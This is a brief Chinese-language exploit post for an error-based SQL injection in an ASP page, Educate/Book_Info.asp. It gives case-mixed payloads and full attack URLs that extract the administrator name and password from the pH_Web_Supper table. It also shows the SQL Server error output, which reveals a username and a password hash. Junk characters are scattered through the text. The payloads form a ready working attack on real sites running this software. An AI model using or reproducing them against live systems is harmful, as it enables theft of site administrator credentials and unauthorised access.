漏洞出现在Educate/Book_Info.asp ; W* Y+ X0 t: v( J0 C; v8 Q/ z
/ b g4 T% C8 b1 h8 e/ {此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
& T6 j g& ^! O+ [. s# u8 ~
* h! _" L) \ G/ a. p" qexp:如下) @' o: D, S9 {2 l4 Y' s* K: P
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" X! `2 E% i- i) M0 b查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- E& g3 F* B2 ^* }6 }
" }9 v, d6 G0 E. phttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 z6 N0 O! C* o9 t4 ], H + ~7 a- p- E1 X% ~
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ z5 g6 h# N& {
' j- x( p+ \* r" d0 K将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
: g) F4 r6 Y" B/ X& y# ]5 g( B ' Y! e8 J7 B" {7 x2 J. f: I; W Q# R
/Educate/Book_Info.asp,行 86 U$ {4 ]$ I4 u0 g0 G5 Z9 G
/ O. A. Y6 G- H2 \# L0 N- I9 t, L
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)% r" k1 `% ]7 z: r9 D" o
0 V$ v+ ^4 s9 }+ W/ |5 k* s" LMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'8 J& t9 k1 T1 n& A6 W
- N; ]% t8 C) ?- s2 l将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ i. u' j2 R+ p3 c* k 4 ^) `# _ c8 l
/Educate/Book_Info.asp,行 8
. H! h" B0 v2 P+ ~3 K9 V; u |